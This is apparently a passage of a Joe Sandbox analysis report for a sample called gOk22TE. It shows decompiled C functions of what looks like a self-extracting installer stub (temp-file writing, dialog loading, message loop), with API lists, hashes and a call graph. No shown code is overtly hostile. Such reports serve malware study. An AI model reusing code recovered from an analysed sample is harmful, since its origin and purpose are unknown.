                                                                                                                                                                                                                                                0x010e6410
                                                                                                                                                                                                                                                0x010e6415
                                                                                                                                                                                                                                                0x010e6433
                                                                                                                                                                                                                                                0x010e6438
                                                                                                                                                                                                                                                0x010e6449
                                                                                                                                                                                                                                                0x010e6463
                                                                                                                                                                                                                                                0x010e646d
                                                                                                                                                                                                                                                0x010e6477
                                                                                                                                                                                                                                                0x010e6477
                                                                                                                                                                                                                                                0x010e647a
                                                                                                                                                                                                                                                0x010e643a
                                                                                                                                                                                                                                                0x010e643a
                                                                                                                                                                                                                                                0x010e6444
                                                                                                                                                                                                                                                0x010e6444
                                                                                                                                                                                                                                                0x010e6492

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E63EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-256195474
                                                                                                                                                                                                                                                • Opcode ID: 4690ccd8981d8b3b611f4a67a9df4b7b2bdabe8ac6559ae9a29e2aa8be7d7ede
                                                                                                                                                                                                                                                • Instruction ID: e86f7c3869ed5baef272ef4edcfaf9363a92032aef5c215ba45568d8ee1add8b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4690ccd8981d8b3b611f4a67a9df4b7b2bdabe8ac6559ae9a29e2aa8be7d7ede
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C21C3B1A00218AFD720DF26EC88FEA77E8EB59714F0041A9B5C5A7240DAB59D848F64
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E010E1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x10e91e0; // 0xdb8f30
						 *(_t34 + 4) = _t11;
						 *0x10e91e0 = _t34;
						return 1;
					}
					_t25 =  *0x10e8584; // 0x0
					E010E44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x10e8584; // 0x0
				E010E44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                                0x010e47e8
                                                                                                                                                                                                                                                0x010e47f0
                                                                                                                                                                                                                                                0x010e47f4
                                                                                                                                                                                                                                                0x010e480f
                                                                                                                                                                                                                                                0x010e4811
                                                                                                                                                                                                                                                0x010e4814
                                                                                                                                                                                                                                                0x010e4814
                                                                                                                                                                                                                                                0x010e4816
                                                                                                                                                                                                                                                0x010e4817
                                                                                                                                                                                                                                                0x010e4829
                                                                                                                                                                                                                                                0x010e482b
                                                                                                                                                                                                                                                0x010e482f
                                                                                                                                                                                                                                                0x010e484f
                                                                                                                                                                                                                                                0x010e4852
                                                                                                                                                                                                                                                0x010e4855
                                                                                                                                                                                                                                                0x010e4855
                                                                                                                                                                                                                                                0x010e4857
                                                                                                                                                                                                                                                0x010e4858
                                                                                                                                                                                                                                                0x010e4860
                                                                                                                                                                                                                                                0x010e4865
                                                                                                                                                                                                                                                0x010e486a
                                                                                                                                                                                                                                                0x010e486f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4876
                                                                                                                                                                                                                                                0x010e4831
                                                                                                                                                                                                                                                0x010e4841
                                                                                                                                                                                                                                                0x010e4847
                                                                                                                                                                                                                                                0x010e480b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e480b
                                                                                                                                                                                                                                                0x010e47f6
                                                                                                                                                                                                                                                0x010e4806
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010E4E6F), ref: 010E47EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 010E4823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010E4847
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E4851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-256195474
                                                                                                                                                                                                                                                • Opcode ID: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                                                                                                                                                                                                                                                • Instruction ID: ae0e5b722709fefeb4acb3261b6cae43fb5717b90798a9eef993fb356a0b9530
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1959c037caceaa55f6c6784649d72a55cc0e400ca9a8f39063ecbc490c21e19f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B21136B5700601AFE7298E26981CF7A3BDAEBC5700F04845DE9C2CB345CA3ACC06C720
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E6517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E010E6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x10e9a3c; // 0x10e0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E010E44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                                0x010e651f
                                                                                                                                                                                                                                                0x010e652a
                                                                                                                                                                                                                                                0x010e6534
                                                                                                                                                                                                                                                0x010e656b
                                                                                                                                                                                                                                                0x010e6577
                                                                                                                                                                                                                                                0x010e657c
                                                                                                                                                                                                                                                0x010e6536
                                                                                                                                                                                                                                                0x010e653e
                                                                                                                                                                                                                                                0x010e6542
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6544
                                                                                                                                                                                                                                                0x010e6547
                                                                                                                                                                                                                                                0x010e654c
                                                                                                                                                                                                                                                0x010e6549
                                                                                                                                                                                                                                                0x010e6549
                                                                                                                                                                                                                                                0x010e6549
                                                                                                                                                                                                                                                0x010e655e
                                                                                                                                                                                                                                                0x010e6560
                                                                                                                                                                                                                                                0x010e6569
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6569
                                                                                                                                                                                                                                                0x010e6542
                                                                                                                                                                                                                                                0x010e6587

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                                                                                                                                                                                                                                                • Instruction ID: 44db344cbe17339d9dcf8be21b4b6f8ae91a8989624eac15e7621805995329a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5fe3627c3c3bc1004ddc1a2f85ee6989a53240bb051367f573be9ec4632f243
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A201D473300105BFDB205A5AAC08DAB7AECEB89761F010165FA9197144DA76CD1087A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                                0x010e368c
                                                                                                                                                                                                                                                0x010e368f
                                                                                                                                                                                                                                                0x010e3691
                                                                                                                                                                                                                                                0x010e369f
                                                                                                                                                                                                                                                0x010e36a7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e36ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e36bc
                                                                                                                                                                                                                                                0x010e36bc
                                                                                                                                                                                                                                                0x010e36c0
                                                                                                                                                                                                                                                0x010e36cb
                                                                                                                                                                                                                                                0x010e36c2
                                                                                                                                                                                                                                                0x010e36c4
                                                                                                                                                                                                                                                0x010e36c4
                                                                                                                                                                                                                                                0x010e36da
                                                                                                                                                                                                                                                0x010e36e0
                                                                                                                                                                                                                                                0x010e36e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e36e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e36ba
                                                                                                                                                                                                                                                0x010e36ed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 010E36CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                                                                                                                                                                                                                                                • Instruction ID: d540ed2cb228577ffec65b8c72fe2e0a214c89ae4ff836a7235ec16d08be670f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5a1ffd1cfa5568750c9fe66f05118bff92d0387fae048301d28ea3e338fdf99
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9017176A00214ABDB304AAB5C4CEABBFFCEBC9F10F004199BA45EB184D565C540CA60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E010E65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                                0x010e65e8
                                                                                                                                                                                                                                                0x010e65ed
                                                                                                                                                                                                                                                0x010e65ef
                                                                                                                                                                                                                                                0x010e65f2
                                                                                                                                                                                                                                                0x010e65f4
                                                                                                                                                                                                                                                0x010e65f4
                                                                                                                                                                                                                                                0x010e65f6
                                                                                                                                                                                                                                                0x010e65f7
                                                                                                                                                                                                                                                0x010e6608
                                                                                                                                                                                                                                                0x010e6611
                                                                                                                                                                                                                                                0x010e6618
                                                                                                                                                                                                                                                0x010e661c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e660e
                                                                                                                                                                                                                                                0x010e6623
                                                                                                                                                                                                                                                0x010e6625
                                                                                                                                                                                                                                                0x010e663b
                                                                                                                                                                                                                                                0x010e663b
                                                                                                                                                                                                                                                0x010e663d
                                                                                                                                                                                                                                                0x010e6641
                                                                                                                                                                                                                                                0x010e6610
                                                                                                                                                                                                                                                0x010e6610
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e6610
                                                                                                                                                                                                                                                0x010e6644
                                                                                                                                                                                                                                                0x010e6647
                                                                                                                                                                                                                                                0x010e6647
                                                                                                                                                                                                                                                0x010e6621
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010E2B33), ref: 010E6602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 010E6612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 010E6629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 010E6635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                                                                                                                                                                                                                                                • Instruction ID: 57f11d350ae75b048ca88217acc0318f45caee9f11807e2f91d7ff4f4e32250c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8a2cd59008d77eaefa2e0953e6bbcfbdb9f8b42c9ad25808f2a85d1c3fab5c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACF0F432205150AEE7330A2FAC8C8BBBFDCDB9F594F1941EFE8D587101D61B49068B61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x10e81f8 = E010E6C70();
				__set_app_type(E010E6FBE(2));
				 *0x10e88a4 =  *0x10e88a4 | 0xffffffff;
				 *0x10e88a8 =  *0x10e88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x10e8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x10e851c; // 0x0
				 *_t5 = _t12;
				_t6 = E010E7000();
				if( *0x10e8000 == 0) {
					__setusermatherr(E010E7000);
				}
				E010E71EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                                0x010e69b7
                                                                                                                                                                                                                                                0x010e69c2
                                                                                                                                                                                                                                                0x010e69c8
                                                                                                                                                                                                                                                0x010e69cf
                                                                                                                                                                                                                                                0x010e69d8
                                                                                                                                                                                                                                                0x010e69de
                                                                                                                                                                                                                                                0x010e69e4
                                                                                                                                                                                                                                                0x010e69e6
                                                                                                                                                                                                                                                0x010e69ec
                                                                                                                                                                                                                                                0x010e69f2
                                                                                                                                                                                                                                                0x010e69f4
                                                                                                                                                                                                                                                0x010e6a00
                                                                                                                                                                                                                                                0x010e6a07
                                                                                                                                                                                                                                                0x010e6a0d
                                                                                                                                                                                                                                                0x010e6a0e
                                                                                                                                                                                                                                                0x010e6a15

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010E6FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 010E69C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 010E69D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 010E69E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 010E6A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                                                                                                                                                                                                                                                • Instruction ID: 7c6d10c152326dcdace8bd71c8d3d99b823a3a198dd28e055e05585cd4c5c624
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4779e4dab892187234cf3fe03e87d4cacdf896e136f6932e7c3d599e8fad097
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0DA74A04311CFC6786B3BF60D6043BE2EB18B21B10464AE4E19E2D8CF3F81408B10
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                                callgraph 0 Function_00007FFBACE2000B 1 Function_00007FFBACE21B10 24 Function_00007FFBACE22049 1->24 2 Function_00007FFBACE20710 33 Function_00007FFBACE20138 2->33 3 Function_00007FFBACE20E52 4 Function_00007FFBACE20B51 5 Function_00007FFBACE20198 6 Function_00007FFBACE201D8 6->5 6->6 18 Function_00007FFBACE201C8 6->18 35 Function_00007FFBACE201B8 6->35 40 Function_00007FFBACE201E8 6->40 41 Function_00007FFBACE201A8 6->41 7 Function_00007FFBACE20158 25 Function_00007FFBACE2102C 7->25 8 Function_00007FFBACE20118 9 Function_00007FFBACE20A7E 10 Function_00007FFBACE2077D 26 Function_00007FFBACE20A2E 10->26 11 Function_00007FFBACE20E02 12 Function_00007FFBACE20AC1 12->7 12->8 17 Function_00007FFBACE20148 12->17 42 Function_00007FFBACE20168 12->42 13 Function_00007FFBACE21A41 14 Function_00007FFBACE20481 14->5 14->6 14->18 14->35 14->40 14->41 15 Function_00007FFBACE20108 16 Function_00007FFBACE21188 16->2 16->8 16->15 43 Function_00007FFBACE20128 16->43 17->25 18->5 18->6 18->18 18->35 18->40 18->41 19 Function_00007FFBACE20188 20 Function_00007FFBACE2108A 21 Function_00007FFBACE2190A 21->8 21->17 21->19 22 Function_00007FFBACE2214A 36 Function_00007FFBACE2223A 22->36 23 Function_00007FFBACE206CA 27 Function_00007FFBACE206ED 27->33 28 Function_00007FFBACE20B2D 29 Function_00007FFBACE21931 29->8 29->17 29->19 30 Function_00007FFBACE20C34 30->11 31 Function_00007FFBACE22273 32 Function_00007FFBACE21838 32->8 32->15 32->43 34 Function_00007FFBACE20178 35->5 35->6 35->18 35->35 35->40 35->41 37 Function_00007FFBACE21A1D 38 Function_00007FFBACE21760 39 Function_00007FFBACE21262 40->5 40->6 40->18 40->35 40->40 40->41

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 00007FFBACE21B10 Relevance: 2.0, APIs: 1, Instructions: 546COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
